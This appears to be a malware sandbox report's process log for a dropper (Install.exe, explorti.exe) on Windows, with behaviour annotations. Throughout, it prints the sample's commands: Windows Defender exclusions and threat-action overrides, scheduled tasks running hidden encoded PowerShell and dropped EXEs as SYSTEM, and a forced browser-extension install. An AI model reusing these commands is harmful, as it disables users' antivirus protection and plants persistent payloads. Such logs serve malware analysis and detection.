C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:643⤵PID:3360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:323⤵PID:5288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:643⤵PID:3656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWqcgZIgn" /SC once /ST 01:11:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:5292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWqcgZIgn"2⤵PID:5436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWqcgZIgn"2⤵PID:1084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 05:00:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe\" MC /pTOFdidyt 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fxxmGIjnSbKlnnNZc"2⤵PID:4012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 6002⤵
- Program crash
PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe tg /udfdidUwig 385132 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5372 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5556
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4492
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:6028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:6060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4708
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:323⤵PID:3600
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:324⤵PID:1360
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:643⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:323⤵PID:3512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:643⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:323⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:643⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:323⤵PID:4864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:643⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:323⤵PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:643⤵PID:5168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:323⤵PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:643⤵PID:5232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:323⤵PID:5304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:643⤵PID:5312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:323⤵PID:5336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:643⤵PID:5436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giQwGroiL" /SC once /ST 08:51:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giQwGroiL"2⤵PID:5512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giQwGroiL"2⤵PID:6076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LOHPKuWKJcOzSYPZu" /SC once /ST 08:43:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe\" mM /xJnNdiddy 385132 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LOHPKuWKJcOzSYPZu"2⤵PID:5576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 7842⤵
- Program crash
PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5532 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1112
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:940
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5464
-
C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exeC:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe mM /xJnNdiddy 385132 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6072 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "beIeSqxTUIgkrqSZzo"2⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6020
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5644
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:6092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4768 -
